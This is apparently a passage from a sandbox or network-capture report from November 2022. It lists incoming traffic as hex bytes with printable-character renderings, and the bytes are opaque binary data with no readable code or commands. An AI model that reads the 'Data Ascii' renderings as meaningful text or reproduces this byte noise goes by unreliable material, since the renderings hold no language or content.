e2 0c 7b a4 bf d7 a5 6d b5 77 f9 d7 62 b1 76 37 c0 76 79 c1 d1 69 9f 83 0c 4b 5b 92 3a a2 55 8c fc 65 Data Ascii: 5\zf0TOCuM2'2su)7{Y~88I"_TLTfsnPjz(4Ma0\pO!G&WO{Wf&G!NKMi/L5k4-QlFXfU.ufhqvr.Ub\Wo3LipApM{mwbv7vyiK[:Ue
2022-11-07 22:49:10 UTC	13433	IN	Data Raw: 79 27 dd 9b 10 11 82 ff 19 2d ac ad 8d 0c be 58 88 da fa 0b 82 20 4b 1d b3 9b 57 da c4 de e7 9b 11 9a 69 1d 5a 5a 7f ec 04 19 1a 7b db 0b d7 5e 55 7e 92 4a a5 a3 cd 7c bf 77 44 d9 e9 5d c5 63 4e c0 8c ef 46 87 43 59 6d 8b 39 73 d7 03 46 f3 b7 75 ed b4 59 4f 99 bc 81 8b b9 f3 2b cf 0f 61 8d d6 70 db 78 83 87 5b 6e 44 5c 2b 5d bb bf 51 f6 f6 1d e9 6d 67 33 6f 4b 88 0a 2d e0 76 ab 6d 3f 51 5c 02 80 b7 ef 1d 8c ce be 5b e5 fb 06 07 b6 5f 46 24 b7 1a 2b 01 c0 87 ca 6b 83 9b d6 8d 0e a5 ab 80 e2 24 b8 3f 92 9d f6 e5 1a a3 00 83 cc c9 5d 86 ec f6 5f 1e 0f 3a 6e 66 4f 3b 7c db 36 52 e5 22 4e 95 eb af 93 f7 93 15 54 c3 42 f7 dc 98 e2 92 3f a1 15 00 20 37 30 3b 30 72 0a a4 7a c1 d4 3a fe 4e 55 d7 bf 00 4a af ca a8 aa 27 fd 4e f5 04 4c 89 22 48 6d 2f ae 2e 8e c1 01 Data Ascii: y'-X KWiZZ{^U~J\|wD]cNFCYm9sFuYO+apx[nD\+]Qmg3oK-vm?Q\[_F$+k$?]_:nfO;\|6R"NTB? 70;0rz:NUJ'NL"Hm/.
2022-11-07 22:49:10 UTC	13449	IN	Data Raw: 40 d2 f4 30 98 34 51 fc 07 61 32 47 02 af 66 80 64 7b 21 80 6c 73 1e 5f d7 4f 90 5c 55 08 6e 60 2d bb c0 f8 58 90 9c 3d 08 4a 7d 90 7c 0f 76 77 81 a4 c4 64 90 32 bf 51 0f 2d 8e 6a 05 07 f7 40 b2 24 00 a4 7f 3b 9a 03 0f cf 9f 83 a9 81 92 5c 90 04 aa 26 9e e7 fc 7c 97 1d 23 c4 82 0f f0 20 59 dd 1b 58 8a 1e 4a 04 33 ce fd 5c 9d 03 11 e2 ce 42 40 ea 18 b8 de 9d 0d 4a e9 f9 21 89 06 f2 37 89 a4 f6 56 30 39 06 24 cf 0d 82 d3 57 bd bd 81 38 0d 00 fa 36 15 44 a9 0e b3 80 55 01 00 34 0c 00 38 96 a9 db 80 0f 17 01 28 03 2d 20 4a 47 ed 0d 70 fc 03 c9 ef a2 c0 8d 77 72 91 40 79 30 c0 4a 27 07 60 bf fb ce 62 5e c8 af 00 7d 18 90 1c 70 9e 93 e5 42 10 2c 3b cf 61 9e 13 40 f6 12 f2 06 86 9e 02 50 85 39 70 1a 19 0e 00 7d 08 00 2a 9a 02 a2 45 95 1c 81 9b e7 e7 1f 0f 82 79 Data Ascii: @04Qa2Gfd{!ls_O\Un`-X=J}\|vwd2Q-j@$;\&\|# YXJ3\B@J!7V09$W86DU48(- JGpwr@y0J'`b^}pB,;a@P9p}*Ey
2022-11-07 22:49:10 UTC	13465	IN	Data Raw: b7 fd a3 17 ab a0 e2 93 47 74 38 55 09 8c e6 ed 9d 7d 86 da 1b 89 25 9e 92 4f cd 5e 6e 4f 23 d6 3d dd d2 4b af 18 06 eb 73 e3 6a e6 bf 15 1e bd c9 1c d3 b9 f4 cf bd cd 3d 4e 32 8c c1 7f 0f 0d 41 69 e3 66 f0 a8 6d f4 a9 7e 23 2e 5c 46 77 17 d3 e0 78 71 c5 a7 cc 63 c1 33 2a cd 79 d2 51 4a 2d c6 d3 be d0 26 70 03 2e 84 68 45 c9 ea 8b c4 2a 7e d2 3a 7a f1 8c 96 82 a6 a8 3a 4c 0d a2 cd 5c 77 a5 c3 bd 81 a9 79 cd 76 56 e0 7d fe 3e e8 7b e2 7a 98 33 a3 c0 f6 f1 ef 7a b4 3a 67 a5 a4 f9 e5 4d 12 6f 1e d5 d9 be f4 22 9d 77 bf 18 66 9d d3 ae 45 c1 67 cf ef 25 ea d8 0a 97 33 ec 94 aa ac be ef 3b db 24 98 c4 d9 72 bf 62 d9 cf f9 30 ce 44 ba b3 29 6a b6 40 3b a2 f7 86 9e 47 d7 12 9d e9 65 f0 ee 22 0b df 86 6f d9 be 6f 9a 09 85 15 ff 87 87 52 95 5f 0e 68 70 e1 af 38 ff Data Ascii: Gt8U}%O^nO#=Ksj=N2Aifm~#.\Fwxqc3yQJ-&p.hE~:z:L\wyvV}>{z3z:gMo"wfEg%3;$rb0D)j@;Ge"ooR_hp8
2022-11-07 22:49:10 UTC	13481	IN	Data Raw: 60 5d 34 f6 fd bf 8f 41 e4 2e 41 00 80 7d d6 0b bd c8 7c 42 fe a1 ec 06 a4 71 85 53 3d 4f 05 09 71 bc 8f b6 2c c7 b6 d4 0a 6c 5e 0b a4 5f 41 76 a8 5b e6 88 d5 a7 25 d5 3f ce ed 8b 88 fc a5 a5 fb ec 76 88 c6 3f 3b 06 e1 51 7b 3d 2b b2 cc 95 d7 0d 89 f4 8b 62 43 b0 d0 a1 5e 1f e9 df 18 88 fd 81 72 c6 74 5a 39 11 aa 90 1e da 5f 5f b6 13 eb 49 7b ba f4 cc 5d 3a b8 8c 0a 97 b5 16 42 be 3c 93 5d 3e b2 33 b0 b9 68 a4 94 1c e5 aa d4 4f f8 79 61 63 de df d1 1a f4 1c 32 b6 1d 96 1c ea 5f 54 95 41 ec c2 2c 27 39 d2 12 8f 57 94 68 37 62 f6 69 df 46 ad 34 5e 97 e0 d7 75 ba e0 88 dc c5 eb 7b 8f 7a 93 99 cd 27 62 9b 7f c6 82 4e 3e 7d 2a 73 6e f1 7e 8b 69 71 d5 36 7c e1 cd d5 53 19 54 b4 11 25 b1 f7 5a 79 c0 a0 51 55 3a 93 d5 90 ef 5c ca d3 4d e5 43 43 26 ea 35 4e 34 bd Data Ascii: `]4A.A}\|BqS=Oq,l^_Av[%?v?;Q{=+bC^rtZ9__I{]:B<]>3hOyac2_TA,'9Wh7biF4^u{z'bN>}*sn~iq6\|ST%ZyQU:\MCC&5N4
2022-11-07 22:49:10 UTC	13497	IN	Data Raw: ef a5 08 48 59 68 4c 59 5b 5a 4a 41 de 23 1b b1 8f b2 c4 c3 62 36 17 7f 70 c0 19 e7 c8 f8 8c 75 d6 10 5e df d0 f9 d0 85 cd 25 02 82 66 c5 49 6b 80 ee 45 fb 6a bb 6e ce 10 cb 32 4e ef e0 1a 0e 7c c8 7e 9a 7c 22 19 16 3b ac 47 d4 b7 67 d7 80 23 dd 38 07 c3 3d 0e 04 fe b2 11 70 bb 41 15 64 f8 83 d0 de d9 4b 00 96 ce 03 20 2b 12 f6 48 72 d1 0b 2d a6 80 80 21 e3 00 02 fe be b5 31 56 4f 1c f2 91 b4 15 80 1d a8 61 77 39 8b 42 5e a9 68 82 fe fc 12 1d cc fc de e8 ad fd f3 1b f2 c4 00 89 3f 9f e9 1d 23 c0 c3 d7 3d fc 3d 50 04 31 03 c5 9a f9 5e a0 c0 12 81 cf 95 39 4e f9 e5 90 d9 f0 d5 bb e6 b9 61 30 52 0e 12 be 07 00 c2 a5 0a 8a 02 4d 23 98 96 b8 48 34 af 16 d2 29 ab 65 d4 5a 07 33 61 08 ef c9 2a 98 d3 66 9c f3 d6 9c e2 4e db 0e 14 e6 39 83 d6 60 2c 3c ac 80 44 2c Data Ascii: HYhLY[ZJA#b6pu^%fIkEjn2N\|~\|";Gg#8=pAdK +Hr-!1VOaw9B^h?#==P1^9Na0RM#H4)eZ3a*fN9`,<D,
2022-11-07 22:49:10 UTC	13513	IN	Data Raw: 68 ae e7 e2 0a 71 aa 3c 1c d3 37 fe e6 1a f5 44 a4 02 d0 98 be 36 78 b2 f2 80 87 0f bd a4 c5 af 46 0a ff 36 9a 4c 80 7c cc 2b 59 d2 35 05 37 96 f7 a7 7a 2d 38 47 cf b2 5a 3d 00 31 ac d0 38 3c 5c 70 85 46 0d ac 1c 37 1f 19 04 96 46 f6 27 3c 54 62 27 4c 00 e3 2e 76 b9 73 15 53 ca c0 a2 e8 65 3f 91 4c 27 7c 41 9d ee d3 65 6b 30 e7 df 7e 85 4e 97 17 e0 9e 75 15 61 2a 7b 47 55 b0 09 63 1b fa 25 b4 f3 ab 9a c1 ac 46 5f 83 3e 3d 5d 66 e3 fd 5b 68 3a c9 d0 04 ea 53 50 2c 70 75 78 f9 7a 39 aa 8a 73 00 be 42 0a a9 9b 33 02 ed 30 e0 29 e0 e6 07 63 2f 76 ff 49 02 ff 56 d6 ea 1e bb 9a 49 7f 88 fb d2 10 de 2d 73 fb 62 11 11 d2 de b9 41 1d 8d 75 fa 20 07 71 f5 53 02 c1 88 e2 f5 b0 a7 0f b3 d8 53 22 8e 31 13 01 00 fd a5 04 0a 3c 65 a0 79 f7 ee 00 8a a6 57 6b b9 b3 7c 87 Data Ascii: hq<7D6xF6L\|+Y57z-8GZ=18<\pF7F'<Tb'L.vsSe?L'\|Aek0~Nua*{GUc%F_>=]f[h:SP,puxz9sB30)c/vIVI-sbAu qSS"1<eyWk\|
2022-11-07 22:49:10 UTC	13529	IN	Data Raw: 90 d5 a1 53 a2 1c 9a 11 39 44 53 8f ed 89 f2 d8 14 0f c5 17 94 d5 f9 9e 55 d4 83 06 3a db af 8f 38 e9 df e6 a8 fa 1c 67 26 5f d4 74 9d ee 75 d4 68 57 bd 4f f0 45 f3 19 0f da 22 4d d9 4f ea 0d 99 f2 fd a7 28 f6 69 d3 82 eb 09 98 00 b5 71 3a bd 2f b1 1e 5f 83 18 26 5b 8b 08 fb fb 47 4f 4d 34 50 0b bb aa 6b 1c 88 c8 8f cc 56 df 3b 8d 49 39 a6 cc e1 ae 75 16 c3 2f 72 48 f4 f3 a8 fd 2b ac 51 84 75 48 12 1f 7a ca b6 72 3a e8 a3 b4 d2 15 a9 33 5a 4f cf 62 2b 2d c5 44 a4 15 39 c4 49 b8 75 18 d7 a3 72 43 6a 99 35 ca db 3e 7d 58 c1 9d 27 13 96 2e 49 6e c3 fd ee 0b 90 5b ae ae 5b 62 9b 5f 0f e2 d9 25 12 e9 43 89 2a 65 35 0f f1 ae 0f 96 c9 51 9b 68 c6 da 44 73 6a 9f 21 19 75 2d bf b8 59 70 8c a3 38 cb 1b c3 11 1c 4c 8d 91 ba 47 f9 7e ef 80 96 b2 61 ed dd a1 21 01 a7 Data Ascii: S9DSU:8g&_tuhWOE"MO(iq:/_&[GOM4PkV;I9u/rH+QuHzr:3ZOb+-D9IurCj5>}X'.In[[b_%C*e5QhDsj!u-Yp8LG~a!
2022-11-07 22:49:10 UTC	13545	IN	Data Raw: 81 30 84 79 e2 7b 7d 9b a6 fa 6d 58 8d 34 c1 d6 e3 58 c2 76 af 2c 94 44 3c 5c 4c 53 cc a2 bc 66 0e d5 11 37 32 dd 06 36 12 27 2c 60 62 14 9a a1 f1 c2 ad 93 56 9b 40 06 71 58 e9 18 ad 24 81 b5 05 4c 21 4c 72 98 03 a2 68 92 b4 a0 6b 2f 1e 1a e8 53 2e 59 a8 98 c2 1e 54 47 09 f6 78 4a bb 8e 2d b0 89 34 61 cd e0 81 ee f2 58 2b 60 42 7c 6e 3d e7 75 c2 e8 ca 26 ec 6c f9 f7 b7 e3 b1 d8 af 5b 5d c0 19 c5 75 fc aa 10 7e c8 ba 09 4e a2 b9 10 7a a3 b6 99 a5 91 1a cc 23 4c 28 33 de bf 9b 3d 83 01 ea 68 c7 3f 79 ef fd 83 c3 5b fb b0 11 e9 3f 6f 04 6f dc 9f b7 c6 50 18 d5 2b 6c 74 f7 74 57 e6 26 e4 45 67 2b f1 d7 da 2a 77 df 06 be f7 22 d1 ee 7d db 3d b7 9b 1a 26 c8 a2 be be dd 71 ef 6a fe 36 7c 8a 34 b9 59 31 b6 d4 08 d5 e8 16 d2 16 92 5f 39 e3 76 4e 5a 70 0f f9 a5 a0 Data Ascii: 0y{}mX4Xv,D<\LSf726',`bV@qX$L!Lrhk/S.YTGxJ-4aX+`B\|n=u&l[]u~Nz#L(3=h?y[?ooP+lttW&Eg+*w"}=&qj6\|4Y1_9vNZp
2022-11-07 22:49:10 UTC	13561	IN	Data Raw: ed c8 89 44 07 fd 88 b2 a0 d5 1a 5a 13 c7 61 ae c3 4b ef 82 ed d8 19 44 8d 30 47 66 b5 22 ca c4 59 88 81 97 7a c1 4b a3 e1 a5 87 a0 d5 17 be 5d b5 13 59 a4 23 f6 08 6c 77 4b 66 1e 07 2d 43 78 69 0d b4 56 c0 b7 ab 71 ee 6e c1 df 7a 40 2b 06 6c ef 00 6f 47 e0 a5 87 c0 f6 60 f0 f6 e7 1b b3 29 b4 66 40 6b 1d d8 ae 03 6f 01 f0 52 47 68 e5 42 cb 1f 5a b6 60 7b 29 ca 49 27 f8 5b 09 7c 9b 06 a3 c3 40 6b 1e d8 76 05 6f eb c0 c0 22 2c e6 f6 23 f0 0d 15 fc 1a 6c df 9a 80 f3 1e c1 3c 10 bc 69 4a ce 05 68 dd 02 6f 0c b6 ad e1 a5 d3 83 b1 36 95 cc 9b 6c 71 1d 60 fb e0 2a e4 1c f4 a8 1c 07 f0 0e ad be 60 bb b1 01 51 d2 20 f8 08 bc 74 3e 18 e8 8f 7e 1b 0e 2d 44 11 b2 8f c3 6c 84 97 2e 86 e7 b8 43 ab 35 7c 3b 01 5a 45 f0 d2 fd 28 54 ee 07 98 3f c3 b7 b5 e0 a5 fd e1 a5 89 Data Ascii: DZaKD0Gf"YzK]Y#lwKf-CxiVqnz@+loG`)f@koRGhBZ`{)I'[\|@kvo",#l<iJho6lq`*`Q t>~-Dl.C5\|;ZE(T?
2022-11-07 22:49:10 UTC	13577	IN	Data Raw: 8e 52 ca e9 22 25 17 30 70 f2 b0 8a bf 9d 51 3a 5e 43 4e 0e 03 db ad d1 81 83 1f db 15 fb cc cc a4 a7 3e e9 6c b0 ba 8c d3 cf 77 92 8c b3 ff c0 2e 3f 8c 68 74 88 91 a4 cf 23 03 aa c6 ec 68 40 26 af b8 75 95 ed 6f 78 b3 99 38 89 b5 d3 27 f1 cf 5c 6f be 98 7b 95 6f c2 4b f7 cf 22 aa 4e 50 71 dd 0b 15 8f c4 9c f9 ed 23 25 b3 0b 2a 0e bf a7 e2 b1 ad a4 f4 7d 8b 8a f5 ce aa 7e a6 d8 51 65 8f ae c8 e2 60 fb 9d e6 fd 9c 66 64 6e 51 5e de 4c f2 80 0f 2c cc 28 57 7b 66 77 a2 68 bf 72 75 f3 84 4e 92 a4 57 9d e8 4e 6d 27 12 3f 75 a4 f6 0f ea f8 0b b2 eb 7a 64 d7 04 e4 e4 32 78 69 2f 78 a9 2e bc f4 de 44 09 55 5f 53 f1 dd 3e 52 fa d7 4a 46 ee 61 2a be 7f 56 a5 be 87 33 3f b2 ad 96 24 7c bd 94 fe cc 96 4a 7a 3d 55 6e b9 d6 1b 19 08 39 b9 d3 41 e6 96 cd d1 0f 7e d9 98 Data Ascii: R"%0pQ:^CN>lw.?ht#h@&uox8'\o{oK"NPq#%}~Qe`fdnQ^L,(W{fwhruNWNm'?uzd2xi/x.DU_S>RJFaV3?$\|Jz=Un9A~
2022-11-07 22:49:10 UTC	13593	IN	Data Raw: f9 29 34 d3 49 84 b9 c4 a2 20 9e 72 6f 2e 1b 51 9e 33 66 d1 95 b7 2d c7 10 1c d9 67 b9 4a fa b5 74 6c 75 a3 2f ce 4c 3a 6e 2c 21 ec 30 5d 76 05 8c 9b 14 04 a1 14 7d cf b6 8f 96 7d 9e 46 71 db 5b 57 27 3e b4 f8 5b 98 a2 55 75 10 8d b4 5b 0a db 2a 3c e1 3d fd 9d 70 27 58 ec bd c6 b9 87 f8 9f 9e 5a 39 1a fc 8c a1 c2 11 77 83 a0 04 c2 f2 dd 00 7b de 0d 1b cb 2c 95 85 d5 61 8c be 68 98 1e 38 9e 23 72 bf 9d ec 0a 7d 94 c4 7c 23 b6 8f a1 1d 35 cc 30 ec 5f ca 0f ff 74 2c d5 23 63 5d cb a6 e4 a9 90 5d 44 4b 29 ff 1d 14 42 21 9d 12 88 c1 25 9e 70 f5 31 43 e0 aa 3d 63 35 71 9b cc 42 11 7d c4 1d 7e 79 47 45 17 ac 9f b1 16 26 6a bf f1 f6 f8 9b ca 6b 7b bb 8b e2 1f 19 ad 78 ca 6e a2 47 ce 93 fd 93 ef aa b9 4d a2 e9 4a 05 b9 86 be 6c 40 a1 38 6a d5 5f 54 56 61 b7 9b 60 Data Ascii: )4I ro.Q3f-gJtlu/L:n,!0]v}}Fq[W'>[Uu[*<=p'XZ9w{,ah8#r}\|#50_t,#c]]DK)B!%p1C=c5qB}~yGE&jk{xnGMJl@8j_TVa`
2022-11-07 22:49:10 UTC	13609	IN	Data Raw: 4c c6 42 fd 20 3b f4 4c 99 7a ec d0 b1 df f3 cc 09 ef 49 78 f0 76 dc 86 ed ff 68 d2 91 9d 8b 16 49 2f 6c 89 0c e4 1b c7 82 56 6e 4a 8f 9a 26 b2 14 8e f3 0c f4 57 1b b9 a8 dc 99 8e 31 2b 6a c8 ed 7f 5e e9 ca e7 9b d0 11 18 67 e1 09 37 ac 68 31 cb 2b c2 95 7e dd af a1 ad d4 26 eb 04 da ac 35 a4 e6 e0 da 4a 7c ac 77 a4 ac 4f bb aa 9c ee b1 97 7c f6 cb eb fe 21 dc ae 58 d4 46 f3 67 da 72 89 35 48 e3 ce b3 9c 38 47 a2 ad 14 8b 0a b1 27 41 e8 ed 85 c4 5a db d5 6a ce 06 ef b1 f9 4f 7c e1 2f f0 98 e2 5b dd 27 19 72 b0 c1 ba 8d 78 c2 c0 a1 8a de 2b 26 42 a3 6f 2b 8e 68 fd 48 14 25 2e 2c 5f 54 44 7d 91 18 98 5a 46 45 64 dd 7c f1 fb f1 3d 86 f3 b9 3a 42 fe a6 95 10 7b d3 ef 67 7c 24 60 f1 52 67 48 97 f1 a4 a4 75 34 8e 50 cc 2c 39 8a a9 9e 7b 31 fb b2 b6 93 b6 41 19 Data Ascii: LB ;LzIxvhI/lVnJ&W1+j^g7h1+~&5J\|wO\|!XFgr5H8G'AZjO\|/['rx+&Bo+hH%.,_TD}ZFEd\|=:B{g\|$`RgHu4P,9{1A
2022-11-07 22:49:10 UTC	13625	IN	Data Raw: 8f d8 3c e3 59 40 9e 67 b8 05 e4 79 a6 bf 80 3c cf 2c 16 90 e7 99 d7 02 f2 3c 0b 59 40 9e 67 d1 0b c8 f3 8c b8 80 3c cf ca 17 90 e7 59 e7 02 f2 3c 63 e5 21 cf 33 21 1e f2 3c 53 e6 21 cf 33 43 1e f2 3c db cb 43 9e 67 70 71 c0 e6 d9 65 1e f2 3c 8b e3 21 cf b3 1c 88 e8 0e b7 1a 22 fa c1 fb 00 44 f4 23 77 ee 85 70 1c a2 ed 87 88 7e e0 8e 87 a8 84 b6 1f 22 ba 5f 74 86 88 fe d8 e1 04 44 3a d8 b1 51 10 e9 21 be 84 c8 00 b1 04 22 7a 1a 68 82 c8 8c 76 fc 22 f8 1c 20 f2 40 64 83 88 83 38 03 a2 3e c4 39 10 2d 20 ce 83 e8 05 51 14 62 08 44 31 88 d1 10 97 43 24 42 54 80 58 0e 51 11 62 27 44 75 88 ac bc 80 a0 05 51 08 22 1e a2 32 c4 39 f0 c1 19 f2 4e 1d 37 f3 c0 e6 60 d8 1f 50 6f 04 11 3e 2c c2 16 88 97 21 6e 85 18 07 d1 18 62 0e 44 13 88 d5 10 b7 41 1c 80 b8 1d 22 37 Data Ascii: <Y@gy<,<Y@g<Y<c!3!<S!3C<Cgpqe<!"D#wp~"_tD:Q!"zhv" @d8>9- QbD1C$BTXQb'DuQ"29N7`Po>,!nbDA"7
2022-11-07 22:49:10 UTC	13641	IN	Data Raw: 3d ee e5 3b 7a 3e 57 a6 b0 b4 88 e4 8f c7 33 ca 0d fc 02 3d 98 0b 14 c2 8e 1d b6 dc d6 fc 34 29 90 a7 c1 da 91 f3 e8 8b d4 ba cc 6a 66 a4 70 f0 ba b5 c7 03 2d 6b e7 3d 45 6c 6a 2d ce 6d 74 02 1f 95 d9 ee 49 26 d6 7a 2f 2d 30 54 2d ba 2b 71 d6 5e f1 4d e1 c1 c0 c8 d7 a6 43 17 ae 70 35 19 35 86 13 54 9a 5d f2 6b e6 95 8f 4a 1b 3d d7 58 46 77 dc d2 2f 85 dd 62 e1 53 06 67 c2 f5 0e b6 76 42 b6 ea 3a 1f b6 84 ec 77 22 21 20 b5 6f 25 bf 0f bb cb 95 ec c7 ac be 67 b6 8e f6 f6 b7 05 f8 0d 77 21 4e c7 89 c5 a3 5b ab e0 e6 53 dc 57 95 f9 f8 27 fe fe 52 de 79 57 1d 95 1f e7 dc ee 74 50 13 60 49 3a c6 eb 9e f5 c9 c6 b0 96 37 3d f8 f9 d3 3a 7f 56 86 84 86 2f 17 4a cd 6b 5d 1b dc 3b 9b e3 3a 15 ae d6 9c a5 7b fd b2 cc b0 57 b6 57 e7 e8 53 69 eb cd 56 c1 d9 f5 0d 23 cf Data Ascii: =;z>W3=4)jfp-k=Elj-mtI&z/-0T-+q^MCp55T]kJ=XFw/bSgvB:w"! o%gw!N[SW'RyWtP`I:7=:V/Jk];:{WWSiV#
2022-11-07 22:49:10 UTC	13657	IN	Data Raw: 8d fd 0f e6 5b 9c 1a 36 08 d6 03 ea 8a 68 7f 73 4d 0d 25 8d da d3 2a 4f db e0 6b 6b 75 45 82 b0 17 19 cb ce 41 dd a4 5c c6 43 b7 44 d1 47 dd 4e 18 a8 4d 5f 5e e5 a2 25 7a cd da e3 5e af 13 5d 82 ad 9f 4b a4 47 76 a3 ae c2 5e 48 a8 5a d9 47 71 70 b7 1b f2 07 ec f0 ca 7b 37 fc bc f8 0d 4b c3 43 cb 81 9e 91 c0 ba ea 77 ce f5 2e 05 d7 14 10 83 01 5f c7 2d 69 d1 99 2c b4 06 8b 42 8c be 00 4f 51 46 66 8f bf c5 d8 9f 0b c3 c5 52 be b4 ee a5 9f 0e 0b ae 73 ad f3 7d e4 f2 2e e8 1a 55 86 4f 9f 25 a5 58 ef 36 99 5c fd 10 69 e9 4f db cd a0 34 27 f4 43 f0 3a a7 3f f8 6d 3e 9f ee 69 c5 c6 c9 20 55 d8 5b 33 3e 94 4a d8 1f fe a1 2a 1d c9 73 95 19 d0 5b 47 a9 73 c1 52 3f 28 d2 a0 93 a5 dc 79 db e8 16 1b 8b 38 f8 60 9a f8 fc 6b d9 ab ad 03 79 c8 cc 2e 8d e0 f8 11 ba 90 d7 Data Ascii: [6hsM%OkkuEA\CDGNM_^%z^]KGv^HZGqp{7KCw._-i,BOQFfRs}.UO%X6\iO4'C:?m>i U[3>Js[GsR?(y8`ky.
2022-11-07 22:49:10 UTC	13673	IN	Data Raw: fe 5f b1 af 65 6b 0f 4e 1a 65 0f 4e 0e 88 c1 ad 3e 51 fa 43 29 63 5b c1 77 85 84 66 6c ee c5 89 ff 7f 7e ff c0 ff d2 7f d3 3e a5 ff fd 77 ab ff 8f fd bb d5 87 fa 17 74 59 98 78 99 c0 a7 b1 9c 3e 75 fc 12 f5 ff da 0b 01 18 e8 40 66 e6 91 6a 07 00 ce 1d a7 8f 6b 1b f8 f6 cc 54 85 90 1b 45 24 10 d2 b8 d2 a0 3f df a0 95 77 13 7b 91 35 f7 83 37 13 ee 87 23 ea be 28 49 e8 8e 5d 1b 79 cb ef 15 eb 94 f9 d0 3c 8d 3f 2a c9 cd 20 e2 f3 53 43 fb ae fe d7 ab c6 41 ba b0 67 fb 9d ad d6 93 73 3c 5b 34 f8 2a 3c ff 40 1a 0c 7c d2 89 58 4a 5d f4 8b 78 5f 1a b6 74 69 b8 3f 31 6c 28 b5 f5 32 cf 58 20 cf 77 5e 79 9f f6 89 7b 3a af 6d 53 7d 35 8a 57 2f 5e 78 15 d3 54 d4 19 7b cd 31 60 a2 22 73 35 36 ea f5 41 a4 68 74 63 14 9b 07 89 b1 14 8a 4d d7 80 76 4c 73 e9 1b b7 98 b3 7f Data Ascii: _ekNeN>QC)c[wfl~>wtYx>u@fjkTE$?w{57#(I]y<?* SCAgs<[4*<@\|XJ]x_ti?1l(2X w^y{:mS}5W/^xT{1`"s56AhtcMvLs
2022-11-07 22:49:10 UTC	13689	IN	Data Raw: d0 c8 37 3b 26 f5 58 20 d2 52 e3 a3 83 c5 91 88 a7 bb 66 d9 52 98 c6 6c ba e4 27 6c 93 da 41 10 4b 26 31 18 40 a6 2f 32 30 74 6c 0b b7 6c 76 f1 9d fd c8 32 f1 6a 41 8a fd 8d ea 1b 67 90 0a 44 11 40 98 2b a3 47 fd 50 9e 4d c9 4c 56 21 bb ab e1 95 2a 64 a0 e0 5a 49 0c 55 0b 60 a0 e1 d6 18 3f 95 ef 36 93 3b 64 72 8e 79 c7 c7 98 94 53 83 8f 42 28 06 2e 68 ae eb 28 4c 51 d2 ed 4e d6 64 ae 27 93 14 d2 3c 62 40 39 c3 39 9d d1 c9 bd 19 59 ee 40 63 54 17 e8 95 8a 38 ce a6 eb 61 50 32 2d 6e 1f 67 5b 17 c2 e3 da 25 e5 9f 43 64 38 b0 e9 f2 65 ea bb a4 e2 8d eb 25 f2 6b 45 78 48 84 50 c5 64 2e 86 1b b7 c7 32 1a 46 ed 3e ee 23 83 b8 5c b3 e7 8e a4 d0 87 98 23 52 99 f2 a4 4c e8 99 de a7 61 a9 1a 3d 7c 0f 9e 0c cb bd 71 f3 ad 04 b6 44 b9 4e 6c 4a 6b 88 78 64 5f ca 6e 03 Data Ascii: 7;&X RfRl'lAK&1@/20tllv2jAgD@+GPMLV!*dZIU`?6;drySB(.h(LQNd'<b@99Y@cT8aP2-ng[%Cd8e%kExHPd.2F>#\#RLa=\|qDNlJkxd_n
2022-11-07 22:49:10 UTC	13705	IN	Data Raw: 22 94 fe 8c 8e 03 f3 c0 bc 91 91 91 4a 0b e7 e8 85 f3 eb 52 71 c2 5c 0b f3 c2 b8 70 8e 5d 38 3f 2e 15 27 cc 95 30 6f 54 54 94 d2 9f 1d eb 61 5e 18 ff ec 78 09 f3 de ba 75 0b 05 b5 c7 fb 9f 1d ef 60 1e 98 f7 f1 e3 c7 1c 50 3b a2 08 7d 61 b9 08 f3 c0 bc 00 10 ab f8 57 f0 67 7c ed 2f d7 bf be f5 55 f0 b7 6f a0 df be 81 7e fb 06 fa ed 6b ff a7 80 08 b9 2c 98 f3 17 01 c0 d1 65 00 44 86 cf 9d 84 94 8c 7c 19 40 46 4a 82 2b 81 e4 fb 5e 17 17 00 29 ce 99 3f 09 d9 b2 81 18 a6 27 fe 49 7a a2 e5 d3 13 fd 92 f4 e4 cb 25 27 5f 44 8f f7 65 fe cd c8 bf 4a 4f 00 7c ea 37 23 78 f8 97 e9 7f 08 ff 0e 3d c5 72 e5 a7 f8 93 f4 04 c0 a7 7e 33 82 87 5f 9c fe 87 f0 ef d0 53 2e 57 7e ca 3f 49 ff 87 df b2 f8 63 04 0f bf 38 fd 0f e1 df a1 a7 5b 16 2d 1d f4 37 9f 3f dd 32 fe 08 f9 13 Data Ascii: "JRq\p]8?.'0oTTa^xu`P;}aWg\|/Uo~k,eD\|@FJ+^)?'Iz%'_DeJO\|7#x=r~3_S.W~?Ic8[-7?2
2022-11-07 22:49:10 UTC	13721	IN	Data Raw: 19 6c ab 23 20 ce 66 77 5b 00 0b a3 da 0d 65 58 76 2c af 44 03 ce 76 f7 ba 64 1c d7 fe f0 19 33 bc cd 4e f8 0f 36 bc e5 22 6c 7f 83 21 b3 17 0b f2 e4 cf 80 3c 05 33 20 77 3e 1e f1 f1 69 70 53 fe 0c 16 be de 04 63 c1 0c 76 53 fe 97 b3 6c f3 b6 be 5b 82 39 04 3b 1f 1c c2 72 6b dc 12 04 61 14 db 9b 0c f2 49 36 82 7c 12 8d 38 db 9f f3 b9 ee 2f 73 97 cf ae 05 b6 bf 05 e8 ba 08 dd 16 d1 40 f1 81 8b f2 b8 31 18 06 af 06 2c 76 73 e1 2c 76 33 7c d6 ae 00 27 3b 16 8f b3 70 88 ab 0b 0f 54 17 5c 9d 0a a6 13 fe d8 fe 42 7e b0 8d 10 b6 57 c2 a1 c6 1d 41 2c 5c 0f d5 4b ba 38 9b 21 4e 7e 08 f9 21 dc be e7 8b ce 33 9e 7d 13 67 b3 5c 8c 03 73 e7 00 bf 99 e6 8e 4f 9b 28 b8 87 7f 8f a0 e1 4c b2 78 16 0b 9f 13 fc 16 e2 eb 34 0d 12 ea c7 5d 30 fb 07 bb 83 d6 6d 21 2d cd bb 42 Data Ascii: l# fw[eXv,Dvd3N6"l!<3 w>ipScvSl[9;rkaI6\|8/s@1,vs,v3\|';pT\B~WA,\K8!N~!3}g\sO(Lx4]0m!-B
